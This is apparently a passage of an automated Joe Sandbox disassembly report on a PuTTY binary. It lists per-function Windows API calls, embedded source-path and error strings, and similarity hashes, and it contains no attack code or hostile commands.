                    Uniqueness Score: -1.00%

                    APIs
                    • SetWindowTextA.USER32(?,00000000), ref: 00BCE137
                    • SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00CB0020), ref: 00BCE158
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BCE184
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BCE1DB
                    • GetParent.USER32(?), ref: 00BCE202
                    • SetActiveWindow.USER32(00000000), ref: 00BCE209
                    • DestroyWindow.USER32(?), ref: 00BCE210
                    • SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 00BCE24F
                    • SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 00BCE27F
                    • _strlen.LIBCMT ref: 00BCE2C6
                    • MessageBeep.USER32(00000000), ref: 00BCE2F5
                    • _strlen.LIBCMT ref: 00BCE35E
                    • SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 00BCE431
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
                    • String ID: %s Event Log
                    • API String ID: 2560716093-583241876
                    • Opcode ID: 5a1e2eaa81747f02b558cf1ff75496e17e9d379b237f631ef6b1fc93c53e775b
                    • Instruction ID: 90f56530f911594dad1af1558e30645177f3d4252956af9ea22ff893bbe4bba6
                    • Opcode Fuzzy Hash: 5a1e2eaa81747f02b558cf1ff75496e17e9d379b237f631ef6b1fc93c53e775b
                    • Instruction Fuzzy Hash: 3991E071A04300EBE721AF20EC96F6E33E8EB54704F08066DF956DB2A1D674ED44CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: ", algorithm=$", nc=$", qop=$", realm="$", uri="$, cnonce="$, nonce="$, opaque="$, response="$, userhash=true$username="
                    • API String ID: 4218353326-1072239674
                    • Opcode ID: 84372c40716ae2ac238274a63ec8d7c3fd9899cb6282e097ca8ff500e0f48f7a
                    • Instruction ID: 2397f8863a8c84f8421793e9cb2a8d362ee2729d80246249c8f87d5d91d98067
                    • Opcode Fuzzy Hash: 84372c40716ae2ac238274a63ec8d7c3fd9899cb6282e097ca8ff500e0f48f7a
                    • Instruction Fuzzy Hash: 0B3208B6804640BFD7216B50EC02E6EBBE5EF55305F484468FD8C56263EB32D624DF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                      • Part of subcall function 00BEC620: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                    • LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BEC54D
                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BEC55D
                    • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BEC572
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BEC585
                    • GetLastError.KERNEL32(?,00000000,?), ref: 00BEC5BD
                    • LocalFree.KERNEL32(00000000), ref: 00BEC5E0
                    • LocalFree.KERNEL32(00000000), ref: 00BEC5F4
                    Strings
                    • unable to initialise security descriptor: %s, xrefs: 00BEC5AA
                    • unable to set DACL in security descriptor: %s, xrefs: 00BEC5B8
                    • unable to construct ACL: %s, xrefs: 00BEC53B
                    • unable to allocate security descriptor: %s, xrefs: 00BEC5A3, 00BEC5CD
                    • unable to set owner in security descriptor: %s, xrefs: 00BEC5B1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                    • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                    • API String ID: 436594416-3066058096
                    • Opcode ID: 0af604cd6dee46560f7dfcec0df078e4504b7b9201f849822590d2db9ad67453
                    • Instruction ID: af656796dd527759d0c24053be452d51e86957350988577b74965d0b6dcbe97e
                    • Opcode Fuzzy Hash: 0af604cd6dee46560f7dfcec0df078e4504b7b9201f849822590d2db9ad67453
                    • Instruction Fuzzy Hash: 31414BB0604381AFEB109F26DC4AB5B7BE4FF85704F104569F98A9B3A0D776D901CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C3EF96
                    • CreateNamedPipeA.KERNEL32(?,40080003,00000008,000000FF,00001000,00001000,00000000), ref: 00C3F009
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C3F042
                    • GetLastError.KERNEL32 ref: 00C3F068
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    Strings
                    • strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C3EF79
                    • unable to create named pipe '%s': %s, xrefs: 00C3F07C
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-server.c, xrefs: 00C3EF74, 00C3EFA7
                    • strchr(pipename + 9, '\\') == NULL, xrefs: 00C3EFAC
                    • \\.\pipe\, xrefs: 00C3EF5D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Create_strlen$ErrorEventFormatLastMessageNamedPipe___from_strstr_to_strchr_strcat
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
                    • API String ID: 3167155451-1267929399
                    • Opcode ID: 36fa64369b2b5b34d1e6d57772e4e2de04d01072b3875fc0b15fe0c875572bc9
                    • Instruction ID: e9fa34395cba73ca3346ec1b82e484c584288ad1c4efc47dd151989d70fb192c
                    • Opcode Fuzzy Hash: 36fa64369b2b5b34d1e6d57772e4e2de04d01072b3875fc0b15fe0c875572bc9
                    • Instruction Fuzzy Hash: A541B3B1A40300AFE330AF25DC46B177BE4EF48758F044928F94A9B2C2E7B1A5088B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GlobalAlloc.KERNEL32(00002002,?), ref: 00BB610C
                    • GlobalLock.KERNEL32 ref: 00BB611D
                    • GlobalUnlock.KERNEL32(00000000), ref: 00BB6140
                    • SendMessageA.USER32(00008002,00000001,00000000), ref: 00BB6159
                    • OpenClipboard.USER32 ref: 00BB6165
                    • EmptyClipboard.USER32 ref: 00BB616F
                    • SetClipboardData.USER32(00000001,00000000), ref: 00BB6178
                    • CloseClipboard.USER32 ref: 00BB617E
                    • SendMessageA.USER32(00008002,00000000,00000000), ref: 00BB6197
                    • GlobalFree.KERNEL32 ref: 00BB61A3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
                    • String ID:
                    • API String ID: 1228832834-0
                    • Opcode ID: fd0aaf4794ce9c62aef94172ed3eeb0e11ff461df178ec33e7623e6af0af2d6d
                    • Instruction ID: 8a3be4051ed24cd81f50f279487262fa0c0433cdaf60cdbc5223f618e76e7eb9
                    • Opcode Fuzzy Hash: fd0aaf4794ce9c62aef94172ed3eeb0e11ff461df178ec33e7623e6af0af2d6d
                    • Instruction Fuzzy Hash: 16115171641304AFE7202F64AC0DFAE3BECEB42749F184568F687A64E1D7795C05CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                    • GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                      • Part of subcall function 00BEC330: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                      • Part of subcall function 00BEC330: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                      • Part of subcall function 00BEC330: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                      • Part of subcall function 00BEC330: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                      • Part of subcall function 00BEC330: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                      • Part of subcall function 00BEC330: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                      • Part of subcall function 00BEC330: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    • GetLastError.KERNEL32 ref: 00BEC6ED
                    • GetLastError.KERNEL32 ref: 00BEC704
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    Strings
                    • unable to construct SID for local same-user access only: %s, xrefs: 00BEC6E6
                    • unable to construct SID for current user: %s, xrefs: 00BEC6FD
                    • unable to construct SID for world: %s, xrefs: 00BEC714
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen_strlen
                    • String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
                    • API String ID: 3303103131-2222155745
                    • Opcode ID: 95cdaebeaf6480f581110c75879fbac406bdfdb71ec31b80fc93786255e3eced
                    • Instruction ID: 8c496efbba450451bac5b03c40a6c8e4aca49c377dc32e55eb85114d4fe95600
                    • Opcode Fuzzy Hash: 95cdaebeaf6480f581110c75879fbac406bdfdb71ec31b80fc93786255e3eced
                    • Instruction Fuzzy Hash: 2E21CFB0600381AFDB10AF65AC4AB6B3AE8EB08705F101569F846D72D1EB75D885CB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • recv.WS2_32(?,?,00005000,00000001), ref: 00BE6848
                    • accept.WS2_32(?,?,00000080), ref: 00BE6898
                    • WSAGetLastError.WS2_32 ref: 00BE68A5
                    • closesocket.WS2_32(00000000), ref: 00BE68F8
                    • recv.WS2_32(?,?,00005000,00000000), ref: 00BE698B
                    • ioctlsocket.WS2_32(?,40047307,00000001), ref: 00BE69FE
                    • WSAGetLastError.WS2_32 ref: 00BE6A10
                    • recv.WS2_32(?,?,00005000,00000000), ref: 00BE6A30
                    • WSAGetLastError.WS2_32 ref: 00BE6A61
                      • Part of subcall function 00BD8D50: GetTickCount.KERNEL32 ref: 00BD8D78
                      • Part of subcall function 00BD8D50: QueryPerformanceCounter.KERNEL32 ref: 00BD8D96
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLastrecv$CountCounterPerformanceQueryTickacceptclosesocketioctlsocket
                    • String ID:
                    • API String ID: 2595003436-0
                    • Opcode ID: d5f131652d3633d91a17c949dea28720eb2e11983cde812c122420d406596e39
                    • Instruction ID: 2a1420f5ceca0a979495fe61313c68c74771f0205ae2702f83b6efb9cf937dc6
                    • Opcode Fuzzy Hash: d5f131652d3633d91a17c949dea28720eb2e11983cde812c122420d406596e39
                    • Instruction Fuzzy Hash: 80B1C075600380AFE720DF25CC85B2B77E9EF98744F14496CF99697292EB71E808CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000107), ref: 00BD8B89
                    • _strlen.LIBCMT ref: 00BD8B90
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD8BAD
                    • FindNextFileA.KERNEL32(00000000,?), ref: 00BD8BCD
                    • FindClose.KERNEL32(00000000), ref: 00BD8BD4
                    • GetCurrentProcessId.KERNEL32 ref: 00BD8BDA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows_strlen
                    • String ID: \*
                    • API String ID: 4151488164-2355939697
                    • Opcode ID: 1997b7336eb686e7ce16332126eb4db5dd8380b677fbd6a06d20a5805b87af5b
                    • Instruction ID: 83944f92dad9a3e6268921262ab5db543ed8be2ac99e6d402c5b34003ec44891
                    • Opcode Fuzzy Hash: 1997b7336eb686e7ce16332126eb4db5dd8380b677fbd6a06d20a5805b87af5b
                    • Instruction Fuzzy Hash: 1F1106B1504210ABD2207724BC4AFDF77E8DF4A319F060424F58AD7281EB35A90587E7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c$count234(term->screen) == newrows$count234(term->scrollback) <= newsavelines$count234(term->scrollback) >= term->tempsblines$sblen >= term->tempsblines$term->rows == count234(term->screen)$term->rows == newrows
                    • API String ID: 0-3028371564
                    • Opcode ID: bb093e90e1b5c289fc4251b17f5c6d806eab87f3caee23b2ed8d4c103032269c
                    • Instruction ID: 62a20f4621a8743d3b12bba20e21553f82926c774b069a4aced7c1304de41ad5
                    • Opcode Fuzzy Hash: bb093e90e1b5c289fc4251b17f5c6d806eab87f3caee23b2ed8d4c103032269c
                    • Instruction Fuzzy Hash: 997282B59043019FC720CF18C881BAAB7F1FF89314F1489ADE9999B352D372E955CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/bidi.c$ctx->ds_sp < lenof(ctx->dsstack)$ctx->ds_sp > 0$ctx->levels[j] == irslevel$false && "how did this get past the outer switch?"$i == ctx->textlen - 1
                    • API String ID: 0-634529421
                    • Opcode ID: 789ce6975b5c2b85b0d3cfeee6d934266e9a294b5751631b8f19c63ec1280889
                    • Instruction ID: 8c37ef053a0472d461fe24ab3db8c0592063a970be4fab57cc692f6b509abfe1
                    • Opcode Fuzzy Hash: 789ce6975b5c2b85b0d3cfeee6d934266e9a294b5751631b8f19c63ec1280889
                    • Instruction Fuzzy Hash: C7E2BB75A087058FCB24CF18C491F6AB7E2FB99314F1889ADE99A8B351D731BC44DB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID:
                    • API String ID: 1497175149-0
                    • Opcode ID: cbf13e3ab771947de8c1a66565d23f33c68c9b69b3f5225380c1a84270f62cdc
                    • Instruction ID: 34cd7abcbb18d8035529def0e0f9099c6683a1fd3e19d9ff8577c9045010cf28
                    • Opcode Fuzzy Hash: cbf13e3ab771947de8c1a66565d23f33c68c9b69b3f5225380c1a84270f62cdc
                    • Instruction Fuzzy Hash: E311D5B1D042045BD710EB15AC81A6F73E4EF95749F09052CFC89D7341FA31EA0486A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: Comm$Encryption$PuTTY-User-Key-File-1$PuTTY-User-Key-File-2$PuTTY-User-Key-File-3$aes256-cbc$ent
                    • API String ID: 0-287418747
                    • Opcode ID: eacac9b2b9bfdfa956c026dd5275d09ec7af0640dc45bfc318c0225910c4a655
                    • Instruction ID: c388b1e45fb47c64f7a87c7205c556ff6b8af6389679ff6b575e1378b9ca7a7e
                    • Opcode Fuzzy Hash: eacac9b2b9bfdfa956c026dd5275d09ec7af0640dc45bfc318c0225910c4a655
                    • Instruction Fuzzy Hash: FE5148B1A0430057D7389A29A846BAF73E25F83304FC4492CF87A87251EB75DAC6F253
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C683D4,00000002,00000000,?,?,?,00C683D4,?,00000000), ref: 00C68A8E
                    • GetLocaleInfoW.KERNEL32(?,20001004,00C683D4,00000002,00000000,?,?,?,00C683D4,?,00000000), ref: 00C68AB7
                    • GetACP.KERNEL32(?,?,00C683D4,?,00000000), ref: 00C68ACC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 4a840f206c85c2749fd80ade7c175e40ecddbcf7cbe8e12113ad089ba0ed0972
                    • Instruction ID: 4cb8996fbdd6ea1e60efacea4976f783248f13f98fe0d5325a237f3411c655d0
                    • Opcode Fuzzy Hash: 4a840f206c85c2749fd80ade7c175e40ecddbcf7cbe8e12113ad089ba0ed0972
                    • Instruction Fuzzy Hash: C821D022600101ABDB348F95C980B9773AAEF54B54B568666EE1AD7602FF32DF48F350
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                    • _strlen.LIBCMT ref: 00BECD26
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD40
                    Strings
                    • (unable to format: FormatMessage returned %u), xrefs: 00BECD47
                    • Error %d: %s, xrefs: 00BECD5D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage_strlen
                    • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                    • API String ID: 2706427827-1777221902
                    • Opcode ID: fd9f00d8f7ef42c25e8d8254867432f2c820e1f7d81d8ed44a34d0eda75dac4e
                    • Instruction ID: 0d0b4001484fd8f9f45946491bd2b867d0122579566704ffe05445c136ef9a14
                    • Opcode Fuzzy Hash: fd9f00d8f7ef42c25e8d8254867432f2c820e1f7d81d8ed44a34d0eda75dac4e
                    • Instruction Fuzzy Hash: 322129B1A443806BD731AB25AC07F9B3FE4EB59740F040578F599D62A2FBB1A8409393
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
